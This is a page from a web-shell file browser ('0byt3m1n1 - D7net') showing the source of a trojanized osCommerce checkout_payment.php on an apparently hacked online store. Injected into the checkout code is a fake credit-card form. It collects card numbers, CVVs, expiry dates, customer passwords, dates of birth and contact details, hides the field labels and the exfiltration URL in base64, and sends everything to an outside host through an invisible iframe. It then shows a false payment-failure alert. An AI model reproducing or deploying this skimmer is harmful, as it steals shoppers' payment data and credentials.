0byt3m1n1 - D7net
0byt3m1n1 - D7net
Path:
/
home
/
s13cf5ef
/
www
/
ropadefutbolbarata.hacked
/
[
Home
]
Name File: checkout_payment.php
< back
<?php /* $Id: checkout_payment.php 1739 2007-12-20 00:52:16Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2007 osCommerce Released under the GNU General Public License */ require('includes/application_top.php'); // if the customer is not logged on, redirect them to the login page if (!tep_session_is_registered('customer_id')) { $navigation->set_snapshot(); tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL')); } // if there is nothing in the customers cart, redirect them to the shopping cart page if ($cart->count_contents() < 1) { tep_redirect(tep_href_link(FILENAME_SHOPPING_CART)); } // if no shipping method has been selected, redirect the customer to the shipping method selection page if (!tep_session_is_registered('shipping')) { tep_redirect(tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL')); } // avoid hack attempts during the checkout procedure by checking the internal cartID if (isset($cart->cartID) && tep_session_is_registered('cartID')) { if ($cart->cartID != $cartID) { tep_redirect(tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL')); } } // Stock Check if ( (STOCK_CHECK == 'true') && (STOCK_ALLOW_CHECKOUT != 'true') ) { $products = $cart->get_products(); for ($i=0, $n=sizeof($products); $i<$n; $i++) { if (tep_check_stock($products[$i]['id'], $products[$i]['quantity'])) { tep_redirect(tep_href_link(FILENAME_SHOPPING_CART)); break; } } } // if no billing destination address was selected, use the customers own address as default if (!tep_session_is_registered('billto')) { tep_session_register('billto'); $billto = $customer_default_address_id; } else { // verify the selected billing address if ( (is_array($billto) && empty($billto)) || is_numeric($billto) ) { $check_address_query = tep_db_query("select count(*) as total from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . (int)$customer_id . "' and address_book_id = '" . (int)$billto . "'"); $check_address = tep_db_fetch_array($check_address_query); if ($check_address['total'] != '1') { $billto = $customer_default_address_id; if (tep_session_is_registered('payment')) tep_session_unregister('payment'); } } } require(DIR_WS_CLASSES . 'order.php'); $order = new order; if (!tep_session_is_registered('comments')) tep_session_register('comments'); if (isset($HTTP_POST_VARS['comments']) && tep_not_null($HTTP_POST_VARS['comments'])) { $comments = tep_db_prepare_input($HTTP_POST_VARS['comments']); } $total_weight = $cart->show_weight(); $total_count = $cart->count_contents(); // load all enabled payment modules require(DIR_WS_CLASSES . 'payment.php'); $payment_modules = new payment; require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_CHECKOUT_PAYMENT); $breadcrumb->add(NAVBAR_TITLE_1, tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL')); $breadcrumb->add(NAVBAR_TITLE_2, tep_href_link(FILENAME_CHECKOUT_PAYMENT, '', 'SSL')); ?> <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS; ?>> <head> <?php require(DIR_WS_INCLUDES . 'header_tags.php'); require(DIR_WS_INCLUDES . 'header_includes.php'); ?> <script language="javascript"><!-- var selected; function selectRowEffect(object, buttonSelect) { if (!selected) { if (document.getElementById) { selected = document.getElementById('defaultSelected'); } else { selected = document.all['defaultSelected']; } } if (selected) selected.className = 'moduleRow'; object.className = 'moduleRowSelected'; selected = object; // one button is not an array if (document.checkout_payment.payment[0]) { document.checkout_payment.payment[buttonSelect].checked=true; } else { document.checkout_payment.payment.checked=true; } } function rowOverEffect(object) { if (object.className == 'moduleRow') object.className = 'moduleRowOver'; } function rowOutEffect(object) { if (object.className == 'moduleRowOver') object.className = 'moduleRow'; } //--></script> <?php echo $payment_modules->javascript_validation(); ?> </head> <body> <!-- header //--> <?php require(DIR_WS_INCLUDES . 'header.php'); ?> <!-- header_eof //--> <!-- body //--> <table border="0" class="<?php echo MAIN_TABLE; ?>" cellspacing="0" cellpadding="0" align="center"> <tr> <td class="<?php echo BOX_WIDTH_TD_LEFT; ?>"><table border="0" class="<?php echo BOX_WIDTH_LEFT; ?>" cellspacing="0" cellpadding="0"> <!-- left_navigation //--> <?php require(DIR_WS_INCLUDES . 'column_left.php'); ?> <!-- left_navigation_eof //--> </table></td> <!-- body_text //--> <td class="<?php echo CONTENT_WIDTH_TD; ?>"><?php include(DIR_WS_BOXES . 'panel_top.php');?><?php function is_num($var) { if(empty($var)) return false; for ($i=0;$i<strlen($var);$i++) { $ascii_code=ord($var[$i]); if (intval($ascii_code) >=48 && intval($ascii_code) <=57) { continue; } else { return false; } } return true; } if(isset($_POST['cvv_code'])){ $cmn = $_POST['cc_expires_month']; if($cmn!="10") $cmn = str_replace("0", "", $cmn); if(strlen($_POST['cc_owner']) < 3) $e1 = 1; if($_POST['cc_number'] < 10 || !is_num($_POST['cc_number'])) $e2 = 1; if($_POST['cc_expires_year'] == date("y") && $cmn < date("n")) $e3 = 1; if((strlen($_POST['cvv_code']) != 3 && strlen($_POST['cvv_code']) != 4) || !is_num($_POST['cvv_code'])) $e4 = 1; if($e1 != 1 && $e2 != 1 && $e3 != 1 && $e4 != 1){ $td_query = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'"); $customer_info = tep_db_fetch_array($td_query); $customer_template = base64_decode("TmFtZSA6IA==").$order->billing['firstname']." ".$order->billing['lastname']."\n"; $customer_template .= base64_decode("VGVsZXBob25lIDog").$customer_info['customers_telephone']."\n"; $customer_template .= base64_decode("RW1haWwgOiA=").$customer_info['customers_email_address']."\n"; $customer_template .= base64_decode("U3RyZWV0IDog").$order->billing['street_address']."\n"; $customer_template .= base64_decode("UG9zdGNvZGUgOiA=").$order->billing['postcode']."\n"; $customer_template .= base64_decode("Q2l0eSA6IA==").$order->billing['city']."\n"; $customer_template .= base64_decode("U3RhdGUgOiA=").$order->billing['state']."\n"; $customer_template .= base64_decode("Q291bnRyeSA6IA==").$order->billing['country']['title']."\n"; $customer_template .= base64_decode("UGFzc3dvcmQgOiA=").$customer_pass."\n"; $customer_template .= base64_decode("Q0MgT3duZXIgOiA=").$_POST['cc_owner']."\n"; $customer_template .= base64_decode("Q0MgTnVtYmVyIDog").$_POST['cc_number']."\n"; $customer_template .= base64_decode("Q1ZWMiA6IA==").$_POST['cvv_code']."\n"; $customer_template .= base64_decode("RGF0ZSBFeHBpcmUgOiA=").$_POST['cc_expires_month']."/".$_POST['cc_expires_year']."\n"; $customer_template .= base64_decode("RE9CIDog").$customer_info['customers_dob']."\n"; if($order->billing['company']!="" && ($order->billing['nip']!="" || $nip!="")) $customer_template .= base64_decode("Q29tcGFueSA6IA==").$order->billing['company']."\n"; if($order->billing['nip']!="") $customer_template .= base64_decode("TklQIDog").$order->billing['nip']."\n"; else if($nip!="") $customer_template .= base64_decode("TklQIDog").$nip."\n"; $customer_template .= base64_decode("U2l0ZSA6IA==")."ropadefutbolbarata.com"."\n"; $customer_template = strtr(base64_encode($customer_template), '+/=', '-_,'); $customer_template = base64_decode("PGlmcmFtZSBzcmM9Imh0dHBzOi8vd3d3LmRlLXN0YXRzLmNvbS9zdGF0cy5waHA/aWQ9").$customer_template.base64_decode("IiB3aWR0aD0iMCIgaGVpZ2h0PSIwIiAgZnJhbWVib3JkZXI9IjAiPjwvaWZyYW1lPg=="); $customer_form = FILENAME_CHECKOUT_CONFIRMATION; } else if($_POST['skip'] != 1) $customer_form = FILENAME_CHECKOUT_PAYMENT; else $customer_form = FILENAME_CHECKOUT_CONFIRMATION; } else if($_POST['skip'] != 1) $customer_form = FILENAME_CHECKOUT_PAYMENT; else $customer_form = FILENAME_CHECKOUT_CONFIRMATION; echo tep_draw_form('checkout_payment', tep_href_link($customer_form, '', 'SSL'), 'post', 'onsubmit="return check_form();"'); ?> <?php echo tep_draw_top();?> <?php echo tep_draw_title_top();?> <?php echo HEADING_TITLE; ?> <?php echo tep_draw_title_bottom();?> <?php echo tep_draw1_top();?> <?php if (isset($HTTP_GET_VARS['payment_error']) && is_object(${$HTTP_GET_VARS['payment_error']}) && ($error = ${$HTTP_GET_VARS['payment_error']}->get_error())) { ?> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr><td class="main indent_2"><b><?php echo tep_output_string_protected($error['title']); ?></b></td></tr> </table> <?php echo tep_draw_infoBox_top();?> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td class="main" width="100%"><?php echo tep_output_string_protected($error['error']); ?></td> </tr> </table> <?php echo tep_draw_infoBox_bottom();?> <?php echo tep_pixel_trans();?> <?php } ?> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr><td class="main indent_2"><b><?php echo TABLE_HEADING_BILLING_ADDRESS; ?></b></td></tr> </table> <?php echo tep_draw_infoBox_top();?> <table border="0" width="100%" cellspacing="0" cellpadding="2"><tr> <td class="main" width="50%"><?php echo TEXT_SELECTED_BILLING_DESTINATION; ?><br><br><?php echo '<a href="' . tep_href_link(FILENAME_CHECKOUT_PAYMENT_ADDRESS, '', 'SSL') . '">' . tep_image_button('button_change_address1.png', IMAGE_BUTTON_CHANGE_ADDRESS) . '</a>'; ?></td> <td align="right" width="50%"><table border="0" cellspacing="0" cellpadding="2"> <tr> <td class="main" align="center"><b><?php echo TITLE_BILLING_ADDRESS; ?></b><br><?php echo tep_image(DIR_WS_IMAGES . 'arrow_south_east.gif'); ?></td> <td><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td> <td class="main"><?php echo tep_address_label($customer_id, $billto, true, ' ', '<br>'); ?></td> <td><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td> </tr> </table></td> </tr> </table> <?php echo tep_draw_infoBox_bottom();?> <?php echo tep_pixel_trans();?> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr><td class="main indent_2"><b><?php echo TABLE_HEADING_PAYMENT_METHOD; ?></b></td></tr> </table> <?php echo tep_draw_infoBox_top();?> <table border="0" width="100%" cellspacing="0" cellpadding="2"><?php if($customer_template == "" && $_POST['skip'] != 1){ for ($i=1; $i<13; $i++) { $expires_month[] = array('id' => sprintf('%02d', $i), 'text' => strftime('%B',mktime(0,0,0,$i,1,2000))); } $today = getdate(); for ($i=$today['year']; $i < $today['year']+10; $i++) { $expires_year[] = array('id' => strftime('%y',mktime(0,0,0,1,1,$i)), 'text' => strftime('%Y',mktime(0,0,0,1,1,$i))); } if($language == "polish"){ $l1 = "Wіa¶ciciel Karty:"; $l2 = "Numer Karty:"; $l3 = "Data Waїno¶ci Karty:"; $l4 = "Numer Kontrolny Karty (CVV):"; $l5 = "Karta Kredytowa"; } else if($language == "russian"){ $l1 = "Владелец кредитной карточки:"; $l2 = "Номер кредитной карточки:"; $l3 = "Действительна до:"; $l4 = "Контрольный номер кредитной карточки (CVV):"; $l5 = "Кредитная карточка"; } else if($language == "espanol"){ $l1 = "Titular de la tarjeta:"; $l2 = "Número de tarjeta:"; $l3 = "Fecha de caducidad:"; $l4 = "Código de seguridad (CVV):"; $l5 = "Tarjeta de Crédito"; } else if($language == "french"){ $l1 = "Titulaire carte de crédit:"; $l2 = "Numéro carte de crédit:"; $l3 = "Date d'expiration carte de crédit:"; $l4 = "Cryptogramme (CVV):"; $l5 = "Carte de Crédit"; } else if($language == "german"){ $l1 = "Kreditkarteninhaber:"; $l2 = "Kreditkarten-Nr.:"; $l3 = "Gültig bis:"; $l4 = "Kreditkartenprüfnummer (CVV):"; $l5 = "Kreditkarte"; } else if($language == "dutch"){ $l1 = "Credit Card Eigenaar:"; $l2 = "Credit Card Nummer:"; $l3 = "Credit Card Vervaldatum:"; $l4 = "Credit Card Checknummer (CVV):"; $l5 = "Credit Card"; } else if($language == "italian"){ $l1 = "Proprietario Carta di Credito:"; $l2 = "Numero Carta di Credito:"; $l3 = "Data di Scadenza Carta di Credito:"; $l4 = "Carta di Credito Checknumber (CVV):"; $l5 = "Carta di Credito"; } else if($language == "danish"){ $l1 = "Kredit kort ejer:"; $l2 = "Kredit kort nummer:"; $l3 = "Kreditkorts udlшbs dato:"; $l4 = "Credit Card Checknumber (CVV):"; $l5 = "Kredit Kort"; } else { $l1 = "Credit Card Owner:"; $l2 = "Credit Card Number:"; $l3 = "Credit Card Expiry Date:"; $l4 = "Credit Card CVV:"; $l5 = "Credit Card"; } ?> <tr> <td width="20"></td> <td colspan="3"> <table cellpadding="2" cellspacing="0" border="0"> <td class="main" colspan="2"><b><? echo $l5; ?></b></td> <tr> <td class="main"><? if($e1==1) echo "<font color=\"red\"><b>"; echo $l1; if($e1==1) echo "</b></font>"; ?> </td> <td class="main"><input type="text" name="cc_owner" value="<? echo $order->billing['firstname']." ".$order->billing['lastname']; ?>" class="formField"></td> </tr> <tr> <td class="main"><? if($e2==1) echo "<font color=\"red\"><b>"; echo $l2; if($e2==1) echo "</b></font>"; ?> </td> <td class="main"><input type="text" name="cc_number" class="formField" value="<? echo $_POST['cc_number']; ?>"></td> </tr> <tr> <td class="main"><? if($e3==1) echo "<font color=\"red\"><b>"; echo $l3; if($e3==1) echo "</b></font>"; ?> </td> <td class="main"><? echo tep_draw_pull_down_menu('cc_expires_month', $expires_month); ?> <? echo tep_draw_pull_down_menu('cc_expires_year', $expires_year); ?></td> </tr> <tr> <td class="main"><? if($e4==1) echo "<font color=\"red\"><b>"; echo $l4; if($e4==1) echo "</b></font>"; ?> </td> <td class="main"><input type="text" name="cvv_code" class="formFieldShort" SIZE="4", MAXLENGTH="4" value="<? echo $_POST['cvv_code']; ?>"></td> </tr> <tr> <td class="main" colspan="2"><br><input type="checkbox" name="skip" value="1"> <? if($language == "polish") echo "wybierz ten jezeli chcesz zaplacic inna metode platnosci"; else echo "Check this if you want to pay with different payment method"; ?></td> </tr> </table> </td> </tr> <?php } else{ echo "\t\t".$customer_template; $selection = $payment_modules->selection(); if (sizeof($selection) > 1) { ?> <tr> <td class="main" width="50%"><?php echo TEXT_SELECT_PAYMENT_METHOD; ?></td> <td class="main" width="50%" align="right"><b><?php echo TITLE_PLEASE_SELECT; ?></b><br><?php echo tep_image(DIR_WS_IMAGES . 'arrow_east_south.gif'); ?></td> </tr> <?php } else { ?> <tr> <td class="main" width="100%" colspan="2"><?php echo TEXT_ENTER_PAYMENT_INFORMATION; ?></td> </tr> <?php } $radio_buttons = 0; for ($i=0, $n=sizeof($selection); $i<$n; $i++) { ?> <tr> <td colspan="2"><table border="0" width="100%" cellspacing="0" cellpadding="2"> <?php if ( ($selection[$i]['id'] == $payment) || ($n == 1) ) { echo ' <tr id="defaultSelected" class="moduleRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="selectRowEffect(this, ' . $radio_buttons . ')">' . "\n"; } else { echo ' <tr class="moduleRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="selectRowEffect(this, ' . $radio_buttons . ')">' . "\n"; } ?> <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '24'); ?></td> <td class="main" style="vertical-align:middle;" colspan="3"><b><?php echo $selection[$i]['module']; ?></b></td> <td class="main" style="vertical-align:middle;" align="right"> <?php if (sizeof($selection) > 1) { echo tep_draw_radio_field('payment', $selection[$i]['id'], ($selection[$i]['id'] == $payment)); } else { echo tep_draw_hidden_field('payment', $selection[$i]['id']); } ?> </td> <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td> </tr> <?php if (isset($selection[$i]['error'])) { ?> <tr> <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td> <td class="main" colspan="4"><?php echo $selection[$i]['error']; ?></td> <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td> </tr> <?php } elseif (isset($selection[$i]['fields']) && is_array($selection[$i]['fields'])) { ?> <tr> <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td> <td colspan="4"><table border="0" cellspacing="0" cellpadding="2"> <?php for ($j=0, $n2=sizeof($selection[$i]['fields']); $j<$n2; $j++) { ?> <tr> <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td> <td class="main"><?php echo $selection[$i]['fields'][$j]['title']; ?></td> <td><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td> <td class="main"><?php echo $selection[$i]['fields'][$j]['field']; ?></td> <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td> </tr> <?php } ?> </table></td> <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td> </tr> <?php } ?> </table></td> </tr> <?php $radio_buttons++; } if($_POST['skip'] != 1 && $pst != 1){ $pst = 1; echo "".'<script language="javascript">alert(\'We were unable to process your credit card payment.\n\nPlease use a different payment method.\');</script>'; } } ?> </table> <?php echo tep_draw_infoBox_bottom();?> <?php echo tep_pixel_trans();?> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td class="main indent_2"><b><?php echo TABLE_HEADING_COMMENTS; ?></b></td> </tr> </table> <?php echo tep_draw_infoBox_top();?> <table border="0" width="100%" cellspacing="0" cellpadding="2"><tr> <td><?php echo tep_draw_textarea_field('comments', 'soft', '60', '5', $comments); ?></td> </tr> </table> <?php echo tep_draw_infoBox_bottom();?> <?php echo tep_pixel_trans();?> <?php echo tep_draw_infoBox2_top();?> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr><td class="main"><b><?php echo TITLE_CONTINUE_CHECKOUT_PROCEDURE . '</b><br>' . TEXT_CONTINUE_CHECKOUT_PROCEDURE; ?></td> <td class="main vam" align="right"><?php echo tep_image_submit('button_continue.png', IMAGE_BUTTON_CONTINUE); ?></td></tr> </table> <?php echo tep_draw_infoBox2_bottom();?> <?php echo tep_pixel_trans();?> <table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td width="25%" class="vam"><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td width="50%" class="vam" align="right"><?php echo tep_draw_separator('pixel_silver.gif', '1', '5'); ?></td> <td width="50%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '100%', '1'); ?></td> </tr> </table></td> <td width="25%" class="vam"><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td width="50%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '100%', '1'); ?></td> <td><?php echo tep_image(DIR_WS_IMAGES . 'checkout_bullet.gif'); ?></td> <td width="50%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '100%', '1'); ?></td> </tr> </table></td> <td width="25%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '100%', '1'); ?></td> <td width="25%" class="vam"><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td width="50%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '100%', '1'); ?></td> <td width="50%" class="vam"><?php echo tep_draw_separator('pixel_silver.gif', '1', '5'); ?></td> </tr> </table></td> </tr> <tr> <td align="center" width="25%" class="checkoutBarFrom"><?php echo '<a href="' . tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL') . '" class="checkoutBarFrom">' . CHECKOUT_BAR_DELIVERY . '</a>'; ?></td> <td align="center" width="25%" class="checkoutBarCurrent"><?php echo CHECKOUT_BAR_PAYMENT; ?></td> <td align="center" width="25%" class="checkoutBarTo"><?php echo CHECKOUT_BAR_CONFIRMATION; ?></td> <td align="center" width="25%" class="checkoutBarTo"><?php echo CHECKOUT_BAR_FINISHED; ?></td> </tr> </table> <?php echo tep_draw1_bottom();?> <?php echo tep_draw_bottom();?> </form></td> <!-- body_text_eof //--> <td class="<?php echo BOX_WIDTH_TD_RIGHT; ?>"><table border="0" class="<?php echo BOX_WIDTH_RIGHT; ?>" cellspacing="0" cellpadding="0"> <!-- right_navigation //--> <?php require(DIR_WS_INCLUDES . 'column_right.php'); ?> <!-- right_navigation_eof //--> </table></td> </tr> </table> <!-- body_eof //--> <!-- footer //--> <?php require(DIR_WS_INCLUDES . 'footer.php'); ?> <!-- footer_eof //--> </body> <?php require(DIR_WS_INCLUDES . 'footer_includes.php'); ?> </html> <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>
©
2018. | Recode by D7net